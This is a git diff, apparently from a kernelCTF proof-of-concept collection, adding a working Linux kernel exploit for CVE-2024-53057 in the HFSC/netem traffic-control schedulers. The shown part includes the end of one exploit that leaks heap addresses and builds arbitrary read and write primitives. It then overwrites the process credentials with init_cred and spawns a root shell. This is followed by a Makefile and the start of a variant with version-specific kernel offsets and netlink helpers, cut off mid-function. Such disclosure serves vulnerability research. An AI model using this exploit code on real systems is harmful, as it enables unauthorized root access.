inet bind"); + } + + pin_cpu(0); + + /* Add timer nodes to tree */ + init_timers(); + add_neg_nodes(); + for (int i = 0; i < NUM_NODES - 2; i++) + add_timer_node(add_order[i]); + + /* Add dangling qdisc pointers to tree */ + int parent, n1, n2, netem_spray1[NETEM_SPRAY], netem_spray2[NETEM_SPRAY], enq_qd; + + switch_ns(1); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x150000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x1000000, netem_spray1, 1, add_order[NUM_NODES - 2], 1, 3)); + + switch_ns(2); + do { + hfsc_qdisc_msg.def = 1; + parent = tc_add_qd(&hfsc_qdisc_msg, -1, 0x20000); + parent = tc_add_cl(&fsc_class_msg, parent, 1); + } while (add_qdisc_timer_node(parent, 0x2000000, netem_spray2, 2, add_order[NUM_NODES - 1], 2, 4)); + + /* Enqueue a packet at netem_spray[0] for later */ + switch_ns(2); + hfsc_qdisc_msg.def = 2; + tc_add_qd(&hfsc_qdisc_msg, 0, 0x20000); + parent = tc_add_cl(&rsc_class_msg, 0x20000, 2); + enq_qd = tc_add_qd(&delay_netem_qdisc_msg, parent, 0x2a0000); + loopback_send(); + + + /* Leak heap addresses of attacker netem qdics by removing 15 */ + + long n1_base_kaddr, n1_parms_kaddr, n1_slot_kaddr, n2_base_kaddr, n2_parms_kaddr, n2_slot_kaddr; + long n1_parms_buf[7] = {}, n2_parms_buf[7] = {}; + long n1_slot_buf[5] = {}, n2_slot_buf[5] = {}; + + rm_timer_node(15); + + switch_ns(1); + n1 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray1[i], n1_parms_buf); + if (n1_parms_buf[0]) { + n1 = netem_spray1[i]; + break; + } + } + + switch_ns(2); + n2 = -1; + for (int i = 0; i < NETEM_SPRAY; i++) { + read_netem_parms(netem_spray2[i], n2_parms_buf); + if (n2_parms_buf[0]) { + n2 = netem_spray2[i]; + break; + } + } + if (n1 == -1 || n2 == -1) { + printf("[-] Heap address leak failed: n1 = %x, n2 = %x\n", n1, n2); + exit(EXIT_FAILURE); + } + + if (NETEM_SPRAY > 1) { + switch_ns(1); + tc_del_qd(n1); + switch_ns(2); + tc_del_qd(n2); + } + + + n2_parms_kaddr = n1_parms_buf[0]; + n2_base_kaddr = n2_parms_kaddr & ~1023; + n2_slot_kaddr = n2_base_kaddr + PRIVDATA_OFF + SLOT_CONFIG_OFF; + + n1_parms_kaddr = n2_parms_buf[2]; + n1_base_kaddr = n1_parms_kaddr & ~1023; + n1_slot_kaddr = n1_base_kaddr + PRIVDATA_OFF + SLOT_CONFIG_OFF; + + printf("[+] Found qdiscs: n1 handle = %x, n1 addr = %p\n" + " n2 handle = %x, n2 addr = %p\n", + n1, n1_base_kaddr, n2, n2_base_kaddr); + + + /* Overwrite n2->slot_dist by removing 13 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (s) (c) + \ + (c) + + y is at &n2->latency + */ + + n2_parms_buf[2] = n1_parms_kaddr + 32; // y->rb_left = s = &n1_latency + 32 + n1_parms_buf[5] = n2_base_kaddr + PRIVDATA_OFF + SLOT_DIST_OFF; // s->rb_right = &n2->slot_dist + n1_parms_buf[6] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + + rm_timer_node(13); + + /* Overwrite n2->hash.next by removing 11 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->latency + 32 + */ + + n1_parms_buf[6] = n2_parms_kaddr + 32; // y->rb_left = p = &n1->latency + 32 + n2_parms_buf[6] = n1_slot_kaddr + 8; // p->rb_left = s = &n1->slot + 8 + n1_slot_buf[2] = n2_base_kaddr + 40; // s->rb_right = c = &n2->hash.next + n1_slot_buf[3] = 0; // s->rb_left = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + switch_ns(2); + write_netem_parms(n2, n2_parms_buf, n2_slot_buf); + rm_timer_node(11); + + /* Set up arbitrary read */ + setup_stab_read(n2, n2_parms_kaddr, n2_slot_kaddr, 2); + + printf("[*] Arbitrary read set up\n"); + + /* Overwrite root qdisc's vt_tree by removing 9 (labeled n below) + + (n) (s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->slot + 8 + */ + + long root_qdisc_kaddr, netdevq_kaddr; + + netdevq_kaddr = stab_read_8(n1_base_kaddr + NETDEV_OFF); + root_qdisc_kaddr = stab_read_8(netdevq_kaddr + ROOT_QDISC_OFF); + + n1_slot_buf[3] = n1_parms_kaddr - 16; // y->rb_left = &n1->latency - 16 + n1_parms_buf[0] = n1_parms_kaddr + 32; // p->rb_left = &n1->latency + 32 + n1_parms_buf[5] = root_qdisc_kaddr + PRIVDATA_OFF + ROOT_OFF + + VT_TREE_OFF; // s->rb_left = &root_qdisc->privdata.root.vt_tree + n1_parms_buf[6] = 0; // s->rb_right = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + + rm_timer_node(9); + + /* Set up vt_node write primitive */ + setup_vt_write(n1, n1_base_kaddr, 1); + + printf("[*] Write-what-where set up\n"); + + /* Set f_owner pointer in socket file */ + if (fcntl(inet_socks[1], F_SETOWN, getpid()) == -1) + err_exit("[-] fcntl"); + + /* Read kernel pointers */ + long task_kaddr, init_task_kaddr, init_cred_kaddr, init_fs_kaddr; + long next_addr; + + printf("[*] Getting kernel pointers\n"); + + netdevq_kaddr = stab_read_8(n2_base_kaddr + NETDEV_OFF); + next_addr = handle_to_kaddr(enq_qd, netdevq_kaddr); + + next_addr = stab_read_8(next_addr + PRIVDATA_OFF + T_HEAD_OFF); + next_addr = stab_read_8(next_addr + SK_OFF); + next_addr = stab_read_8(next_addr + SOCK_OFF); + next_addr = stab_read_8(next_addr + FILE_OFF); + next_addr = stab_read_8(next_addr + F_OWNER_OFF + PID_OFF); + next_addr = stab_read_8(next_addr + TASKS_OFF); + task_kaddr = next_addr -= PID_LINKS_OFF; + + do { + init_task_kaddr = next_addr; + next_addr = stab_read_8(next_addr + REAL_PARENT_OFF); + } while (next_addr != init_task_kaddr); + + init_cred_kaddr = stab_read_8(init_task_kaddr + CRED_OFF); + init_fs_kaddr = stab_read_8(init_task_kaddr + FS_OFF); + + printf("[+] task: %p, init_cred: %p, init_fs: %p\n", + task_kaddr, init_cred_kaddr, init_fs_kaddr); + + printf("[*] Overwriting cred and fs\n"); + + /* LPE */ + vt_write_8(task_kaddr + FS_OFF, init_fs_kaddr); + vt_write_8(task_kaddr + CRED_OFF, init_cred_kaddr); + + if (getuid()) { + printf("[-] Privesc failed\n"); + exit(EXIT_FAILURE); + } + + printf("[*] Launching shell\n"); + system("/bin/sh"); + return 0; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/Makefile b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/Makefile new file mode 100644 index 000000000..1275cd02e --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/Makefile @@ -0,0 +1,7 @@ +CFLAGS = -Wno-incompatible-pointer-types -Wno-format -Wno-address-of-packed-member -static -D LTS + +exploit: exploit.c + gcc $(CFLAGS) -o $@ $< + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit new file mode 100644 index 000000000..019dc7b9b Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit.c b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit.c new file mode 100644 index 000000000..e3e8e4820 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/lts-6.6.52/exploit.c @@ -0,0 +1,1465 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#if defined(MITIGATION) || defined(COS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 280 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 336 // offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct disttable, table) +#define ROOT_OFF 16 // offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 100 // offsetof(struct hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 968 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 216 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 112 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define PID_LINKS_OFF 1632 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1536 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 2008 // offsetof(struct task_struct, cred) +#define FS_OFF 2088 // offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define STAB_OFF 40 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 1000 + +#elif defined(LTS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 296 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 352 // offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct disttable, table) +#define ROOT_OFF 16 // offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 96 // offsetof(struct hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 1032 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 224 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 80 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define PID_LINKS_OFF 1608 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1512 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 1984 // offsetof(struct task_struct, cred) +#define FS_OFF 2064 // offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define STAB_OFF 48 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 0 + +#endif + +/* Traffic control handles */ +#define VULN_NETEM_HANDLE 0xdead0000 + +/* Size of disttable */ +#define DIST_SIZE 1020 + +#define TIMER_BASE 50000 +#define TIMER_INC 100 +#define LABEL_TO_VALUE(x) (TIMER_BASE + TIMER_INC*x) + +#define DRR_SPRAY 36 +#define NETEM_SPRAY 20 + +#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0) + +int clog_len; +int curr_ns; +unsigned char msgbuf[65536]; + +/* Netlink Messages */ + +/* Traffic control message header */ +struct __attribute__((packed)) tf_msg { + struct nlmsghdr nh; + struct tcmsg tm; +}; + +/* Network interface message header */ +struct __attribute__((packed)) if_msg { + struct nlmsghdr nh; + struct ifinfomsg ifi; +}; + +/* Set network interface up */ +struct if_msg if_up_msg = { + { + .nlmsg_len = 32, + .nlmsg_type = RTM_NEWLINK, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .ifi_family = AF_UNSPEC, + .ifi_type = ARPHRD_NETROM, + .ifi_flags = IFF_UP, + .ifi_change = 1, + }, + +}; + +/* Add/modify an HFSC qdisc */ +struct __attribute__((packed)) hfsc_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + int def; +}; + +struct hfsc_qdisc_msg hfsc_qdisc_msg = { + { + .nlmsg_len = sizeof(struct hfsc_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 8, + .rta_type = TCA_OPTIONS, + }, +}; + +/* Add/modify an RSC HFSC class */ +struct __attribute__((packed)) rsc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr rsc_hdr; + struct tc_service_curve rsc; +}; + +struct rsc_class_msg rsc_class_msg = { + { + .nlmsg_len = sizeof(struct rsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .rsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_RSC, + }, + .rsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an FSC HFSC class */ +struct __attribute__((packed)) fsc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; +}; + +struct fsc_class_msg fsc_class_msg = { + { + .nlmsg_len = sizeof(struct fsc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 20, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m1 = 1, + .d= 1, + }, +}; + +/* Add/modify an USC HFSC class */ +struct __attribute__((packed)) usc_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr fsc_hdr; + struct tc_service_curve fsc; + struct rtattr usc_hdr; + struct tc_service_curve usc; +}; + +struct usc_class_msg usc_class_msg = { + { + .nlmsg_len = sizeof(struct usc_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "hfsc", + .options_hdr = + { + .rta_len = 36, + .rta_type = TCA_OPTIONS, + }, + .fsc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_FSC, + }, + .fsc = { + .m2 = 1, + }, + .usc_hdr = { + .rta_len = 16, + .rta_type = TCA_HFSC_USC, + }, + .usc = { + .m2 = 1, + }, +}; + +/* Add/modify a DRR qdisc */ +struct __attribute__((packed)) drr_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; +}; + +struct drr_qdisc_msg drr_qdisc_msg = { + { + .nlmsg_len = sizeof(struct drr_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", +}; + +struct __attribute__((packed)) drr_class_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr quantum_hdr; + int quantum; +}; + +/* Add/modify a DRR class */ +struct drr_class_msg drr_class_msg = { + { + .nlmsg_len = sizeof(struct drr_class_msg), + .nlmsg_type = RTM_NEWTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "drr", + .options_hdr = { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .quantum_hdr = { + .rta_len = 8, + .rta_type = TCA_DRR_QUANTUM, + }, + .quantum = 65536, +}; + +/* Add/modify a TBF qdisc to let packets through */ +struct __attribute__((packed)) tbf_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt qopt; +}; + +struct tbf_qdisc_msg tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 44, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .buffer = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1000000000, + }, + }, +}; + +/* Add/modify a TBF qdisc to wait for pkt_len-1 secs */ +struct __attribute__((packed)) stall_tbf_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr qopt_hdr; + struct tc_tbf_qopt qopt; + struct rtattr burst_hdr; + int burst; +}; + +struct stall_tbf_qdisc_msg stall_tbf_qdisc_msg = { + { + .nlmsg_len = sizeof(struct stall_tbf_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "tbf", + .options_hdr = { + .rta_len = 52, + .rta_type = TCA_OPTIONS, + }, + .qopt_hdr = { + .rta_len = 40, + .rta_type = TCA_TBF_PARMS, + }, + .qopt = { + .limit = 65536, + .rate = { + .linklayer = TC_LINKLAYER_ETHERNET, + .rate = 1, + }, + }, + .burst_hdr = { + .rta_len = 8, + .rta_type = TCA_TBF_BURST, + }, + .burst = 1, +}; + + +/* Add/modify a netem qdisc to delay the packet */ +struct __attribute__((packed)) delay_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; +}; + +struct delay_netem_qdisc_msg delay_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct delay_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 28, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + .latency = -1, + } +}; + +/* Add/modify a netem qdisc with many parameters. Used for type confusion */ +struct __attribute__((packed)) parms_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr ecn_hdr; + int ecn; + struct rtattr latency_hdr; + long latency; + struct rtattr jitter_hdr; + long jitter; + struct rtattr reorder_hdr; + struct tc_netem_reorder reorder; + struct rtattr corrupt_hdr; + struct tc_netem_corrupt corrupt; + struct rtattr rate_hdr; + struct tc_netem_rate rate; + struct rtattr rate64_hdr; + long rate64; + struct rtattr slot_hdr; + struct tc_netem_slot slot; +}; + +struct parms_netem_qdisc_msg parms_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct parms_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = { + .rta_len = 160, + .rta_type = TCA_OPTIONS, + }, + .qopt = { + .limit = 65536, + }, + .ecn_hdr = { + .rta_len = 8, + .rta_type = TCA_NETEM_ECN, + }, + .latency_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_LATENCY64, + }, + .jitter_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_JITTER64, + }, + .reorder_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_REORDER, + }, + .corrupt_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_CORRUPT, + }, + .rate64_hdr = { + .rta_len = 12, + .rta_type = TCA_NETEM_RATE64, + }, + .rate_hdr = { + .rta_len = 20, + .rta_type = TCA_NETEM_RATE, + }, + .slot_hdr = { + .rta_len = 44, + .rta_type = TCA_NETEM_SLOT, + }, +}; + +/* Add/modify a netem qdisc with a slot_dist buffer */ +struct __attribute__((packed)) dist_netem_qdisc_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct tc_netem_qopt qopt; + struct rtattr dist_hdr; + char dist[DIST_SIZE]; +}; + +struct dist_netem_qdisc_msg dist_netem_qdisc_msg = { + { + .nlmsg_len = sizeof(struct dist_netem_qdisc_msg), + .nlmsg_type = RTM_NEWQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "netem", + .options_hdr = + { + .rta_len = 32 + DIST_SIZE, + .rta_type = TCA_OPTIONS, + }, + .dist_hdr = { + .rta_len = 4 + DIST_SIZE, + .rta_type = TCA_NETEM_SLOT_DIST, + }, +}; + + +/* Add a basic filter */ +struct __attribute__((packed)) basic_filter_msg { + struct nlmsghdr nh; + struct tcmsg tm; + struct rtattr kind_hdr; + char kind[8]; + struct rtattr options_hdr; + struct rtattr classid_hdr; + int classid; +}; + +struct basic_filter_msg basic_filter_msg = { + { + .nlmsg_len = sizeof(struct basic_filter_msg), + .nlmsg_type = RTM_NEWTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_REPLACE | NLM_F_ACK | NLM_F_CREATE, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + .tcm_handle = 1, + .tcm_info = TC_H_MAKE(1 << 16, 3 << 8), + }, + .kind_hdr = + { + .rta_len = 12, + .rta_type = TCA_KIND, + }, + .kind = "basic", + .options_hdr = + { + .rta_len = 12, + .rta_type = TCA_OPTIONS, + }, + .classid_hdr = { + .rta_len = 8, + .rta_type = TCA_BASIC_CLASSID, + }, +}; + + +/* Delete all of a qdisc's filters */ +struct tf_msg del_filter_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTFILTER, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a qdisc */ +struct tf_msg del_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Delete a class */ +struct tf_msg del_class_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_DELTCLASS, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + +/* Dump info for all qdiscs */ +struct tf_msg get_qdisc_msg = { + { + .nlmsg_len = sizeof(struct tf_msg), + .nlmsg_type = RTM_GETQDISC, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_DUMP, + }, + { + .tcm_family = PF_UNSPEC, + .tcm_ifindex = 1, + }, +}; + + +/* Syscall used to wait for RCU grace period */ +int membarrier(unsigned int flags, int cpu_id) { + return syscall(SYS_membarrier, flags, cpu_id); +} + +void pin_cpu (int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + if (sched_setaffinity(0, sizeof(set), &set)) + err_exit("[-] sched_setaffinity"); +} + +/* + * Send a message on the loopback device. Used to trigger qdisc enqueue and + * dequeue functions. + */ +struct sockaddr_in iaddr; +int nl_sock_fd, inet_sock_fd; +int nl_socks[4], inet_socks[4]; +void loopback_send (void) { + if (sendto(inet_sock_fd, "", 1, 0, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] sendto"); +} + +/* Helper functions for sending netlink messages */ + +void netlink_write (int sock, struct nlmsghdr *m) { + struct { + struct nlmsghdr nh; + struct nlmsgerr ne; + } ack = {}; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + if (read(sock , &ack, sizeof(ack)) == -1) + err_exit("[-] read"); + if (ack.nh.nlmsg_type == NLMSG_ERROR && ack.ne.error) { + errno = -ack.ne.error; + err_exit("[-] netlink"); + } +} + +void netlink_write_noerr (int sock, struct nlmsghdr *m) { + m->nlmsg_flags &= ~NLM_F_ACK; + if (write(sock, m, m->nlmsg_len) == -1) + err_exit("[-] write"); + m->nlmsg_flags |= NLM_F_ACK; +} + +int tc_add_qd (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = parent; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); + return m->tm.tcm_handle; +} + +void tc_del_qd (int parent) { + struct tf_msg *m = &del_qdisc_msg; + m->tm.tcm_parent = parent; + netlink_write(nl_sock_fd, m); +} + +int tc_add_cl (struct tf_msg *m, int parent, int handle) { + m->tm.tcm_parent = parent; + m->tm.tcm_handle = parent | handle; + netlink_write(nl_sock_fd, m); + return m->tm.tcm_handle; +} + +void tc_del_cl (int handle) { + struct tf_msg *m = &del_class_msg; + m->tm.tcm_handle = handle; + netlink_write(nl_sock_fd, m); +} + +void tc_add_fl (struct basic_filter_msg *m, int clid) { + m->tm.tcm_parent = clid & 0xffff0000; + m->classid = clid; + netlink_write(nl_sock_fd, m); +} + +void tc_del_fl (int 